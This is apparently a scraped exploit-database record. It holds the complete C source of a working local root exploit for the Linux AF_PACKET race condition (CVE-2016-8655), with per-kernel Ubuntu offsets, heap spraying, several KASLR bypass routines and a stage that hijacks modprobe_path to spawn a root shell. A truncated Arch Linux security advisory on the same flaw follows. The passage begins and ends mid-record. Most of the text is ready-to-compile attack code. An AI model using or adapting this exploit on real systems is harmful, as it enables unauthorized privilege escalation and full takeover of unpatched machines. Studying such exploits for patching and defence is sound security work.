groups=0(root),1000(user)\r\n\r\n*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=\r\n\r\nShoutouts to:\r\njsc for inspiration (https://www.youtube.com/watch?v=x4UDIfcYMKI)\r\nmcdelivery for delivering hotcakes and coffee\r\n\r\n11/2016\r\nby rebel\r\n---\r\nUpdated by <[email\u00a0protected]>\r\n- check number of CPU cores\r\n- KASLR bypasses\r\n- additional kernel targets\r\nhttps://github.com/bcoles/kernel-exploits/tree/master/CVE-2016-8655\r\n*/\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <fcntl.h>\r\n#include <poll.h>\r\n#include <pthread.h>\r\n#include <sched.h>\r\n#include <signal.h>\r\n#include <stdbool.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\n#include <sys/klog.h>\r\n#include <sys/mman.h>\r\n#include 
<sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n#include <sys/syscall.h>\r\n#include <sys/sysinfo.h>\r\n#include <sys/utsname.h>\r\n#include <sys/wait.h>\r\n\r\n#include <arpa/inet.h>\r\n#include <linux/if_packet.h>\r\n#include <linux/sched.h>\r\n#include <netinet/tcp.h>\r\n#include <netinet/if_ether.h>\r\n\r\n#define DEBUG\r\n\r\n#ifdef DEBUG\r\n# define dprintf printf\r\n#else\r\n# define dprintf\r\n#endif\r\n\r\n#define ENABLE_KASLR_BYPASS 1\r\n\r\n// Will be overwritten if ENABLE_KASLR_BYPASS\r\nunsigned long KERNEL_BASE = 0xffffffff81000000ul;\r\n\r\n// Will be overwritten by detect_versions()\r\nint kernel = -1;\r\n\r\n// New sysctl path\r\nconst char *SYSCTL_NAME = \"hack\";\r\nconst char *SYSCTL_PATH = \"/proc/sys/hack\";\r\n\r\nvolatile int barrier = 1;\r\nvolatile int vers_switcher_done = 0;\r\n\r\nstruct kernel_info {\r\n char *kernel_version;\r\n unsigned long proc_dostring;\r\n unsigned long modprobe_path;\r\n unsigned long register_sysctl_table;\r\n unsigned long set_memory_rw;\r\n};\r\n\r\nstruct kernel_info kernels[] = {\r\n { \"4.4.0-21-generic #37~14.04.1-Ubuntu\", 0x084220, 0xc4b000, 0x273a30, 0x06b9d0 },\r\n { \"4.4.0-22-generic #40~14.04.1-Ubuntu\", 0x084250, 0xc4b080, 0x273de0, 0x06b9d0 },\r\n { \"4.4.0-24-generic #43~14.04.1-Ubuntu\", 0x084120, 0xc4b080, 0x2736f0, 0x06b880 },\r\n { \"4.4.0-28-generic #47~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273b70, 0x06b880 },\r\n { \"4.4.0-31-generic #50~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273c20, 0x06b880 },\r\n { \"4.4.0-34-generic #53~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273c40, 0x06b880 },\r\n { \"4.4.0-36-generic #55~14.04.1-Ubuntu\", 0x084160, 0xc4b100, 0x273c60, 0x06b890 },\r\n { \"4.4.0-38-generic #57~14.04.1-Ubuntu\", 0x084210, 0xe4b100, 0x2742e0, 0x06b890 },\r\n { \"4.4.0-42-generic #62~14.04.1-Ubuntu\", 0x084260, 0xe4b100, 0x274300, 0x06b880 },\r\n { \"4.4.0-45-generic #66~14.04.1-Ubuntu\", 0x084260, 0xe4b100, 0x274340, 0x06b880 },\r\n //{\"4.4.0-46-generic 
#67~14.04.1-Ubuntu\",0x0842f0,0xe4b100,0x274580,0x06b880},\r\n { \"4.4.0-47-generic #68~14.04.1-Ubuntu\", 0x0842f0, 0xe4b100, 0x274580, 0x06b880 },\r\n //{\"4.4.0-49-generic #70~14.04.1-Ubuntu\",0x084350,0xe4b100,0x274b10,0x06b880},\r\n { \"4.4.0-51-generic #72~14.04.1-Ubuntu\", 0x084350, 0xe4b100, 0x274750, 0x06b880 },\r\n\r\n { \"4.4.0-21-generic #37-Ubuntu\", 0x087cf0, 0xe48e80, 0x286310, 0x06f370 },\r\n { \"4.4.0-22-generic #40-Ubuntu\", 0x087d40, 0xe48f00, 0x2864d0, 0x06f370 },\r\n { \"4.4.0-24-generic #43-Ubuntu\", 0x087e60, 0xe48f00, 0x2868f0, 0x06f370 },\r\n { \"4.4.0-28-generic #47-Ubuntu\", 0x087ea0, 0xe48f80, 0x286df0, 0x06f370 },\r\n { \"4.4.0-31-generic #50-Ubuntu\", 0x087ea0, 0xe48f80, 0x286e90, 0x06f370 },\r\n { \"4.4.0-34-generic #53-Ubuntu\", 0x087ea0, 0xe48f80, 0x286ed0, 0x06f370 },\r\n { \"4.4.0-36-generic #55-Ubuntu\", 0x087ea0, 0xe48f80, 0x286e50, 0x06f360 },\r\n { \"4.4.0-38-generic #57-Ubuntu\", 0x087f70, 0xe48f80, 0x287470, 0x06f360 },\r\n { \"4.4.0-42-generic #62-Ubuntu\", 0x087fc0, 0xe48f80, 0x2874a0, 0x06f320 },\r\n { \"4.4.0-43-generic #63-Ubuntu\", 0x087fc0, 0xe48f80, 0x2874b0, 0x06f320 },\r\n { \"4.4.0-45-generic #66-Ubuntu\", 0x087fc0, 0xe48f80, 0x2874c0, 0x06f320 },\r\n //{\"4.4.0-46-generic #67-Ubuntu\",0x088040,0xe48f80,0x287800,0x06f320},\r\n { \"4.4.0-47-generic #68-Ubuntu\", 0x088040, 0xe48f80, 0x287800, 0x06f320 },\r\n //{\"4.4.0-49-generic #70-Ubuntu\",0x088090,0xe48f80,0x287d40,0x06f320},\r\n { \"4.4.0-51-generic #72-Ubuntu\", 0x088090, 0xe48f80, 0x2879a0, 0x06f320},\r\n};\r\n\r\n#define VSYSCALL 0xffffffffff600000\r\n#define PROC_DOSTRING (KERNEL_BASE + kernels[kernel].proc_dostring)\r\n#define MODPROBE_PATH (KERNEL_BASE + kernels[kernel].modprobe_path)\r\n#define REGISTER_SYSCTL_TABLE (KERNEL_BASE + kernels[kernel].register_sysctl_table)\r\n#define SET_MEMORY_RW (KERNEL_BASE + kernels[kernel].set_memory_rw)\r\n\r\n#define KMALLOC_PAD 64\r\n\r\nint pad_fds[KMALLOC_PAD];\r\n\r\n// * * * * * * * * * * * * * * Kernel structs * 
* * * * * * * * * * * * * * *\r\n\r\nstruct ctl_table {\r\n const char *procname;\r\n void *data;\r\n int maxlen;\r\n unsigned short mode;\r\n struct ctl_table *child;\r\n void *proc_handler;\r\n void *poll;\r\n void *extra1;\r\n void *extra2;\r\n};\r\n\r\n#define CONF_RING_FRAMES 1\r\n\r\nstruct tpacket_req3 tp;\r\nint sfd;\r\nint mapped = 0;\r\n\r\nstruct timer_list {\r\n void *next;\r\n void *prev;\r\n unsigned long expires;\r\n void (*function)(unsigned long);\r\n unsigned long data;\r\n unsigned int flags;\r\n int slack;\r\n};\r\n\r\n// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *\r\n\r\nvoid *setsockopt_thread(void *arg)\r\n{\r\n while (barrier) {}\r\n setsockopt(sfd, SOL_PACKET, PACKET_RX_RING, (void*) &tp, sizeof(tp));\r\n\r\n return NULL;\r\n}\r\n\r\nvoid *vers_switcher(void *arg)\r\n{\r\n int val,x,y;\r\n\r\n while (barrier) {}\r\n\r\n while (1) {\r\n val = TPACKET_V1;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n\r\n y++;\r\n\r\n if (x != 0) break;\r\n\r\n val = TPACKET_V3;\r\n x = setsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n\r\n if (x != 0) break;\r\n\r\n y++;\r\n }\r\n\r\n dprintf(\"[.] 
version switcher stopping, x = %d (y = %d, last val = %d)\\n\",x,y,val);\r\n vers_switcher_done = 1;\r\n\r\n return NULL;\r\n}\r\n\r\n// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *\r\n\r\n#define BUFSIZE 1408\r\nchar exploitbuf[BUFSIZE];\r\n\r\nvoid kmalloc(void)\r\n{\r\n while(1)\r\n syscall(__NR_add_key, \"user\", \"wtf\", exploitbuf, BUFSIZE - 24, -2);\r\n}\r\n\r\nvoid pad_kmalloc(void)\r\n{\r\n int x;\r\n for (x = 0; x < KMALLOC_PAD; x++)\r\n if (socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP)) == -1) {\r\n dprintf(\"[-] pad_kmalloc() socket error\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n\r\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\r\n\r\nint try_exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n pthread_t setsockopt_thread_thread,a;\r\n int val;\r\n socklen_t l;\r\n struct timer_list *timer;\r\n int fd;\r\n struct tpacket_block_desc *pbd;\r\n int off;\r\n sigset_t set;\r\n\r\n sigemptyset(&set);\r\n\r\n sigaddset(&set, SIGSEGV);\r\n\r\n if (pthread_sigmask(SIG_BLOCK, &set, NULL) != 0) {\r\n dprintf(\"[-] couldn't set sigmask\\n\");\r\n exit(1);\r\n }\r\n\r\n dprintf(\"[.] new exploit attempt starting, jumping to %p, arg=%p\\n\", (void *)func, (void *)arg);\r\n\r\n pad_kmalloc();\r\n\r\n fd = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));\r\n\r\n if (fd == -1) {\r\n dprintf(\"[-] target socket error\\n\");\r\n exit(1);\r\n }\r\n\r\n pad_kmalloc();\r\n\r\n dprintf(\"[.] 
done, sockets allocated\\n\");\r\n\r\n val = TPACKET_V3;\r\n\r\n setsockopt(fd, SOL_PACKET, PACKET_VERSION, &val, sizeof(val));\r\n\r\n tp.tp_block_size = CONF_RING_FRAMES * getpagesize();\r\n tp.tp_block_nr = 1;\r\n tp.tp_frame_size = getpagesize();\r\n tp.tp_frame_nr = CONF_RING_FRAMES;\r\n\r\n // try to set the timeout to 10 seconds\r\n // the default timeout might still be used though depending on when the race was won\r\n tp.tp_retire_blk_tov = 10000;\r\n\r\n sfd = fd;\r\n\r\n if (pthread_create(&setsockopt_thread_thread, NULL, setsockopt_thread, (void *)NULL)) {\r\n dprintf(\"[-] Error creating thread\\n\");\r\n return 1;\r\n }\r\n\r\n pthread_create(&a, NULL, vers_switcher, (void *)NULL);\r\n\r\n usleep(200000);\r\n\r\n dprintf(\"[.] removing barrier and spraying...\\n\");\r\n\r\n memset(exploitbuf, '\\x00', BUFSIZE);\r\n\r\n timer = (struct timer_list *)(exploitbuf+(0x6c*8)+6-8);\r\n timer->next = 0;\r\n timer->prev = 0;\r\n\r\n timer->expires = 4294943360;\r\n timer->function = (void *)func;\r\n timer->data = arg;\r\n timer->flags = 1;\r\n timer->slack = -1;\r\n\r\n barrier = 0;\r\n\r\n usleep(100000);\r\n\r\n while (!vers_switcher_done) usleep(100000);\r\n\r\n l = sizeof(val);\r\n getsockopt(sfd, SOL_PACKET, PACKET_VERSION, &val, &l);\r\n\r\n dprintf(\"[.] current packet version = %d\\n\",val);\r\n\r\n pbd = mmap(0, tp.tp_block_size * tp.tp_block_nr, PROT_READ | PROT_WRITE, MAP_SHARED, sfd, 0);\r\n\r\n if (pbd == MAP_FAILED) {\r\n dprintf(\"[-] could not map pbd\\n\");\r\n exit(1);\r\n } else {\r\n off = pbd->hdr.bh1.offset_to_first_pkt;\r\n dprintf(\"[.] 
pbd->hdr.bh1.offset_to_first_pkt = %d\\n\", off);\r\n }\r\n\r\n\r\n if (val == TPACKET_V1 && off != 0) {\r\n dprintf(\"*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*\\n\");\r\n } else {\r\n dprintf(\"[-] race not won\\n\");\r\n exit(2);\r\n }\r\n\r\n munmap(pbd, tp.tp_block_size * tp.tp_block_nr);\r\n\r\n pthread_create(&a, NULL, verification_func, (void *)NULL);\r\n\r\n dprintf(\"\\n\");\r\n dprintf(\"[!] please wait up to a few minutes for timer to be executed.\\n\");\r\n dprintf(\"[!] if you ctrl-c now the kernel will hang. so don't do that.\\n\");\r\n dprintf(\"\\n\");\r\n\r\n sleep(1);\r\n dprintf(\"[.] closing socket and verifying...\\n\");\r\n\r\n close(sfd);\r\n\r\n kmalloc();\r\n\r\n dprintf(\"[.] all messages sent\\n\");\r\n\r\n sleep(31337);\r\n exit(1);\r\n}\r\n\r\nint verification_result = 0;\r\n\r\nvoid catch_sigsegv(int sig)\r\n{\r\n verification_result = 0;\r\n pthread_exit((void *)1);\r\n}\r\n\r\nvoid *modify_vsyscall(void *arg)\r\n{\r\n unsigned long *vsyscall = (unsigned long *)(VSYSCALL+0x850);\r\n unsigned long x = (unsigned long)arg;\r\n\r\n sigset_t set;\r\n sigemptyset(&set);\r\n sigaddset(&set, SIGSEGV);\r\n\r\n if (pthread_sigmask(SIG_UNBLOCK, &set, NULL) != 0) {\r\n dprintf(\"[-] couldn't set sigmask\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n signal(SIGSEGV, catch_sigsegv);\r\n\r\n *vsyscall = 0xdeadbeef+x;\r\n\r\n if (*vsyscall == 0xdeadbeef+x) {\r\n dprintf(\"[~] vsyscall page altered!\\n\");\r\n verification_result = 1;\r\n pthread_exit(0);\r\n }\r\n\r\n return NULL;\r\n}\r\n\r\nvoid verify_stage1(void)\r\n{\r\n pthread_t v_thread;\r\n\r\n sleep(5);\r\n\r\n int x;\r\n for(x = 0; x < 300; x++) {\r\n\r\n pthread_create(&v_thread, NULL, modify_vsyscall, 0);\r\n\r\n pthread_join(v_thread, NULL);\r\n\r\n if(verification_result == 1) {\r\n exit(0);\r\n }\r\n\r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n\r\n dprintf(\"[-] could not modify vsyscall\\n\");\r\n exit(EXIT_FAILURE);\r\n}\r\n\r\nvoid verify_stage2(void)\r\n{\r\n 
struct stat b;\r\n\r\n sleep(5);\r\n\r\n int x;\r\n for(x = 0; x < 300; x++) {\r\n\r\n if (stat(SYSCTL_PATH, &b) == 0) {\r\n dprintf(\"[~] sysctl added!\\n\");\r\n exit(0);\r\n }\r\n\r\n write(2,\".\",1);\r\n sleep(1);\r\n }\r\n\r\n dprintf(\"[-] could not add sysctl\\n\");\r\n exit(EXIT_FAILURE);\r\n}\r\n\r\nvoid exploit(unsigned long func, unsigned long arg, void *verification_func)\r\n{\r\n int status;\r\n int pid;\r\n\r\nretry:\r\n\r\n pid = fork();\r\n\r\n if (pid == 0) {\r\n try_exploit(func, arg, verification_func);\r\n exit(1);\r\n }\r\n\r\n wait(&status);\r\n\r\n dprintf(\"\\n\");\r\n\r\n if (WEXITSTATUS(status) == 2) {\r\n dprintf(\"[.] retrying stage...\\n\");\r\n kill(pid, 9);\r\n sleep(2);\r\n goto retry;\r\n }\r\n\r\n if (WEXITSTATUS(status) != 0) {\r\n dprintf(\"[-] something bad happened, aborting exploit attempt\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n kill(pid, 9);\r\n}\r\n\r\n\r\nvoid wrapper(void)\r\n{\r\n struct ctl_table *c;\r\n\r\n dprintf(\"[.] making vsyscall page writable...\\n\\n\");\r\n\r\n exploit(SET_MEMORY_RW, VSYSCALL, verify_stage1);\r\n\r\n dprintf(\"[~] done, stage 1 completed\\n\");\r\n\r\n sleep(5);\r\n\r\n dprintf(\"[.] 
registering new sysctl...\\n\\n\");\r\n\r\n c = (struct ctl_table *)(VSYSCALL+0x850);\r\n\r\n memset((char *)(VSYSCALL+0x850), '\\x00', 1952);\r\n\r\n strcpy((char *)(VSYSCALL+0xf00), SYSCTL_NAME);\r\n memcpy((char *)(VSYSCALL+0xe00), \"\\x01\\x00\\x00\\x00\",4);\r\n c->procname = (char *)(VSYSCALL+0xf00);\r\n c->mode = 0666;\r\n c->proc_handler = (void *)(PROC_DOSTRING);\r\n c->data = (void *)(MODPROBE_PATH);\r\n c->maxlen = 256;\r\n c->extra1 = (void *)(VSYSCALL+0xe00);\r\n c->extra2 = (void *)(VSYSCALL+0xd00);\r\n\r\n exploit(REGISTER_SYSCTL_TABLE, VSYSCALL+0x850, verify_stage2);\r\n\r\n dprintf(\"[~] done, stage 2 completed\\n\");\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *\r\n\r\nvoid check_procs() {\r\n int min_procs = 2;\r\n\r\n int nprocs = 0;\r\n nprocs = get_nprocs_conf();\r\n\r\n if (nprocs < min_procs) {\r\n dprintf(\"[-] system has less than %d processor cores\\n\", min_procs);\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n dprintf(\"[.] system has %d processor cores\\n\", nprocs);\r\n}\r\n\r\nstruct utsname get_kernel_version() {\r\n struct utsname u;\r\n int rv = uname(&u);\r\n if (rv != 0) {\r\n dprintf(\"[-] uname())\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n return u;\r\n}\r\n\r\n#define ARRAY_SIZE(x) (sizeof(x) / sizeof((x)[0]))\r\n\r\nvoid detect_versions() {\r\n struct utsname u;\r\n char kernel_version[512];\r\n\r\n u = get_kernel_version();\r\n\r\n if (strstr(u.machine, \"64\") == NULL) {\r\n dprintf(\"[-] system is not using a 64-bit kernel\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n if (strstr(u.version, \"-Ubuntu\") == NULL) {\r\n dprintf(\"[-] system is not using an Ubuntu kernel\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n char *u_ver = strtok(u.version, \" \");\r\n snprintf(kernel_version, 512, \"%s %s\", u.release, u_ver);\r\n\r\n int i;\r\n for (i = 0; i < ARRAY_SIZE(kernels); i++) {\r\n if (strcmp(kernel_version, kernels[i].kernel_version) == 0) {\r\n dprintf(\"[.] 
kernel version '%s' detected\\n\", kernels[i].kernel_version);\r\n kernel = i;\r\n return;\r\n }\r\n }\r\n\r\n dprintf(\"[-] kernel version not recognized\\n\");\r\n exit(EXIT_FAILURE);\r\n}\r\n\r\n// * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *\r\n\r\n#define SYSLOG_ACTION_READ_ALL 3\r\n#define SYSLOG_ACTION_SIZE_BUFFER 10\r\n\r\nbool mmap_syslog(char** buffer, int* size) {\r\n *size = klogctl(SYSLOG_ACTION_SIZE_BUFFER, 0, 0);\r\n if (*size == -1) {\r\n dprintf(\"[-] klogctl(SYSLOG_ACTION_SIZE_BUFFER)\\n\");\r\n return false;\r\n }\r\n\r\n *size = (*size / getpagesize() + 1) * getpagesize();\r\n *buffer = (char*)mmap(NULL, *size, PROT_READ | PROT_WRITE,\r\n MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n\r\n *size = klogctl(SYSLOG_ACTION_READ_ALL, &((*buffer)[0]), *size);\r\n if (*size == -1) {\r\n dprintf(\"[-] klogctl(SYSLOG_ACTION_READ_ALL)\\n\");\r\n return false;\r\n }\r\n\r\n return true;\r\n}\r\n\r\nunsigned long get_kernel_addr_trusty(char* buffer, int size) {\r\n const char* needle1 = \"Freeing unused\";\r\n char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n if (substr == NULL) return 0;\r\n\r\n int start = 0;\r\n int end = 0;\r\n for (end = start; substr[end] != '-'; end++);\r\n\r\n const char* needle2 = \"ffffff\";\r\n substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\r\n if (substr == NULL) return 0;\r\n\r\n char* endptr = &substr[16];\r\n unsigned long r = strtoul(&substr[0], &endptr, 16);\r\n\r\n r &= 0xffffffffff000000ul;\r\n\r\n return r;\r\n}\r\n\r\nunsigned long get_kernel_addr_xenial(char* buffer, int size) {\r\n const char* needle1 = \"Freeing unused\";\r\n char* substr = (char*)memmem(&buffer[0], size, needle1, strlen(needle1));\r\n if (substr == NULL) {\r\n return 0;\r\n }\r\n\r\n int start = 0;\r\n int end = 0;\r\n for (start = 0; substr[start] != '-'; start++);\r\n for (end = start; substr[end] != '\\n'; end++);\r\n\r\n const char* needle2 = \"ffffff\";\r\n 
substr = (char*)memmem(&substr[start], end - start, needle2, strlen(needle2));\r\n if (substr == NULL) {\r\n return 0;\r\n }\r\n\r\n char* endptr = &substr[16];\r\n unsigned long r = strtoul(&substr[0], &endptr, 16);\r\n\r\n r &= 0xfffffffffff00000ul;\r\n r -= 0x1000000ul;\r\n\r\n return r;\r\n}\r\n\r\nunsigned long get_kernel_addr_syslog() {\r\n unsigned long addr = 0;\r\n char* syslog;\r\n int size;\r\n\r\n dprintf(\"[.] trying syslog...\\n\");\r\n\r\n if (!mmap_syslog(&syslog, &size))\r\n return 0;\r\n\r\n if (strstr(kernels[kernel].kernel_version, \"14.04.1\") != NULL)\r\n addr = get_kernel_addr_trusty(syslog, size);\r\n else\r\n addr = get_kernel_addr_xenial(syslog, size);\r\n\r\n if (!addr)\r\n dprintf(\"[-] kernel base not found in syslog\\n\");\r\n\r\n return addr;\r\n}\r\n\r\n// * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr_kallsyms() {\r\n FILE *f;\r\n unsigned long addr = 0;\r\n char dummy;\r\n char sname[256];\r\n char* name = \"startup_64\";\r\n char* path = \"/proc/kallsyms\";\r\n\r\n dprintf(\"[.] trying %s...\\n\", path);\r\n f = fopen(path, \"r\");\r\n if (f == NULL) {\r\n dprintf(\"[-] open/read(%s)\\n\", path);\r\n return 0;\r\n }\r\n\r\n int ret = 0;\r\n while (ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n\r\n fclose(f);\r\n dprintf(\"[-] kernel base not found in %s\\n\", path);\r\n return 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr_sysmap() {\r\n FILE *f;\r\n unsigned long addr = 0;\r\n char path[512] = \"/boot/System.map-\";\r\n char version[32];\r\n\r\n struct utsname u;\r\n u = get_kernel_version();\r\n strcat(path, u.release);\r\n dprintf(\"[.] 
trying %s...\\n\", path);\r\n f = fopen(path, \"r\");\r\n if (f == NULL) {\r\n dprintf(\"[-] open/read(%s)\\n\", path);\r\n return 0;\r\n }\r\n\r\n char dummy;\r\n char sname[256];\r\n char* name = \"startup_64\";\r\n int ret = 0;\r\n while (ret != EOF) {\r\n ret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n if (ret == 0) {\r\n fscanf(f, \"%s\\n\", sname);\r\n continue;\r\n }\r\n if (!strcmp(name, sname)) {\r\n fclose(f);\r\n return addr;\r\n }\r\n }\r\n\r\n fclose(f);\r\n dprintf(\"[-] kernel base not found in %s\\n\", path);\r\n return 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr_mincore() {\r\n unsigned char buf[getpagesize()/sizeof(unsigned char)];\r\n unsigned long iterations = 20000000;\r\n unsigned long addr = 0;\r\n\r\n dprintf(\"[.] trying mincore info leak...\\n\");\r\n /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */\r\n if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,\r\n MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {\r\n dprintf(\"[-] mmap()\\n\");\r\n return 0;\r\n }\r\n\r\n int i;\r\n for (i = 0; i <= iterations; i++) {\r\n /* Touch a mishandle with this type mapping */\r\n if (mincore((void*)0x86000000, 0x1000000, buf)) {\r\n dprintf(\"[-] mincore()\\n\");\r\n return 0;\r\n }\r\n\r\n int n;\r\n for (n = 0; n < getpagesize()/sizeof(unsigned char); n++) {\r\n addr = *(unsigned long*)(&buf[n]);\r\n /* Kernel address space */\r\n if (addr > 0xffffffff00000000) {\r\n addr &= 0xffffffffff000000ul;\r\n if (munmap((void*)0x66000000, 0x20000000000))\r\n dprintf(\"[-] munmap()\\n\");\r\n return addr;\r\n }\r\n }\r\n }\r\n\r\n if (munmap((void*)0x66000000, 0x20000000000))\r\n dprintf(\"[-] munmap()\\n\");\r\n\r\n dprintf(\"[-] kernel base not found in mincore info leak\\n\");\r\n return 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr() {\r\n 
unsigned long addr = 0;\r\n\r\n addr = get_kernel_addr_kallsyms();\r\n if (addr) return addr;\r\n\r\n addr = get_kernel_addr_sysmap();\r\n if (addr) return addr;\r\n\r\n addr = get_kernel_addr_syslog();\r\n if (addr) return addr;\r\n\r\n addr = get_kernel_addr_mincore();\r\n if (addr) return addr;\r\n\r\n dprintf(\"[-] KASLR bypass failed\\n\");\r\n exit(EXIT_FAILURE);\r\n\r\n return 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\r\n\r\nvoid launch_rootshell(void)\r\n{\r\n int fd;\r\n char buf[256];\r\n struct stat s;\r\n\r\n fd = open(SYSCTL_PATH, O_WRONLY);\r\n\r\n if(fd == -1) {\r\n dprintf(\"[-] could not open %s\\n\", SYSCTL_PATH);\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n memset(buf, '\\x00', 256);\r\n\r\n readlink(\"/proc/self/exe\", (char *)&buf, 256);\r\n\r\n write(fd, buf, strlen(buf)+1);\r\n\r\n socket(AF_INET, SOCK_STREAM, 132);\r\n\r\n if (stat(buf,&s) == 0 && s.st_uid == 0) {\r\n dprintf(\"[+] binary executed by kernel, launching rootshell\\n\");\r\n lseek(fd, 0, SEEK_SET);\r\n write(fd, \"/sbin/modprobe\", 15);\r\n close(fd);\r\n execl(buf, buf, NULL);\r\n } else {\r\n dprintf(\"[-] could not create rootshell\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n\r\nvoid setup_sandbox() {\r\n if (unshare(CLONE_NEWUSER) != 0) {\r\n dprintf(\"[-] unshare(CLONE_NEWUSER)\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n\r\n if (unshare(CLONE_NEWNET) != 0) {\r\n dprintf(\"[-] unshare(CLONE_NEWNET)\\n\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n int status, pid;\r\n struct utsname u;\r\n char buf[512], *f;\r\n\r\n if (getuid() == 0 && geteuid() == 0) {\r\n chown(\"/proc/self/exe\", 0, 0);\r\n chmod(\"/proc/self/exe\", 06755);\r\n exit(0);\r\n }\r\n\r\n if (getuid() != 0 && geteuid() == 0) {\r\n setresuid(0, 0, 0);\r\n setresgid(0, 0, 0);\r\n execl(\"/bin/bash\", \"bash\", \"-p\", NULL);\r\n exit(0);\r\n }\r\n\r\n dprintf(\"linux AF_PACKET race condition exploit by rebel\\n\");\r\n\r\n 
dprintf(\"[.] starting\\n\");\r\n\r\n dprintf(\"[.] checking hardware\\n\");\r\n check_procs();\r\n dprintf(\"[~] done, hardware looks good\\n\");\r\n\r\n dprintf(\"[.] checking kernel version\\n\");\r\n detect_versions();\r\n dprintf(\"[~] done, version looks good\\n\");\r\n\r\n#if ENABLE_KASLR_BYPASS\r\n dprintf(\"[.] KASLR bypass enabled, getting kernel base address\\n\");\r\n KERNEL_BASE = get_kernel_addr();\r\n dprintf(\"[~] done, kernel text: %lx\\n\", KERNEL_BASE);\r\n#endif\r\n\r\n dprintf(\"[.] proc_dostring: %lx\\n\", PROC_DOSTRING);\r\n dprintf(\"[.] modprobe_path: %lx\\n\", MODPROBE_PATH);\r\n dprintf(\"[.] register_sysctl_table: %lx\\n\", REGISTER_SYSCTL_TABLE);\r\n dprintf(\"[.] set_memory_rw: %lx\\n\", SET_MEMORY_RW);\r\n\r\n pid = fork();\r\n if (pid == 0) {\r\n dprintf(\"[.] setting up namespace sandbox\\n\");\r\n setup_sandbox();\r\n dprintf(\"[~] done, namespace sandbox set up\\n\");\r\n wrapper();\r\n exit(0);\r\n }\r\n\r\n waitpid(pid, &status, 0);\r\n\r\n launch_rootshell();\r\n return 0;\r\n}\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/33037"}], "archlinux": [{"lastseen": "2020-09-22T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2016-8655"], "description": "Arch Linux Security Advisory ASA-201612-8\n=========================================\n\nSeverity: High\nDate : 2016-12-07\nCVE-ID : CVE-2016-8655\nPackage : linux-zen\nType : privilege escalation\nRemote : No\nLink : https://wiki.archlinux.org/index.php/CVE\n\nSummary\n=======\n\nThe package linux-zen before version 4.8.12-2 is vulnerable to\nprivilege escalation.\n\nResolution\n==========\n\nUpgrade to 4.8.12-2.\n\n# pacman -Syu \"linux-zen>=4.8.12-2\"\n\nThe problem has been fixed upstream but no release is available yet.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\nA race condition issue leading to a use-after-free flaw was found in\nthe way the raw packet sockets 
